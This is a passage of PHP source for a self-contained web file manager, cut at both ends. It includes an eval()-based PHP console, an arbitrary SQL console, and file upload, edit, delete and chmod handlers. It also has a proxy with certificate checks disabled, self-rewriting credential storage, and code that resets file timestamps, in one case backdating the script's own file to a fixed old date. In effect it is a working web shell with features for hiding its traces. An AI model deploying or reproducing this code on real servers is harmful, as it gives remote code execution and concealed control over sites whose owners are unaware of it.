.= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url(""); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url(""); } .file { background-image: url(""); } <?=fm_home_style()?> .img { background-image: url(""); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a 